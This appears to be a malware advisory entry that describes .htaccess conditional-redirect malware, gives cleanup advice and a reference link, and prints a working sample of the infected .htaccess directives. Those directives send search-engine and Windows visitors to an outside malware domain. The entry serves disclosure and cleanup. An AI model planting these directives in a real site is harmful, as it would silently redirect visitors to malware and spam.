Description:
This attack uses .htaccess to redirect users to a site serving malware (or spam).
Loads malware from:
http://blog.natebennettfleming.com/ main.php
And other domains.
Affecting:
Any type of web site (no specific target).
Clean up and details:
Remove offendin code from .htaccess.
Links::
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
Malware sample:
ErrorDocument 500 http://blog.natebennettfleming.com/main.php?i=Jc2tgtAbrvymixjzUMtFypEZ&e=0 ErrorDocument 502 http://blog.natebennettfleming.com/main.php?i=Jc2tgtAbrvymixjzUMtFypEZ&e=2 RewriteCond %{HTTP_REFERER} .google.$ [NC,OR] .. RewriteCond %{HTTP_REFERER} .hotbot.$ [NC,OR] RewriteCond %{HTTP_REFERER} .goto.$ [NC,OR] RewriteCond %{HTTP_REFERER} .infoseek.$ [NC,OR] RewriteCond %{HTTP_REFERER} .mamma.$ [NC,OR] RewriteCond %{HTTP_REFERER} .alltheweb.$ [NC,OR] RewriteCond %{HTTP_REFERER} .lycos.$ [NC,OR] RewriteCond %{HTTP_REFERER} .search.$ [NC,OR] RewriteCond %{HTTP_REFERER} .metacrawler.$ [NC,OR] RewriteCond %{HTTP_REFERER} .mail.$ [NC,OR] RewriteCond %{HTTP_REFERER} .dogpile.$ [NC] RewriteCond %{HTTP_USER_AGENT} .Windows. RewriteRule .* http://blog.natebennettfleming.com/main.php?h=%{HTTP_HOST}&i=Jc2tgtAbrvymixjzU MtFypEZ&e=r [R,L]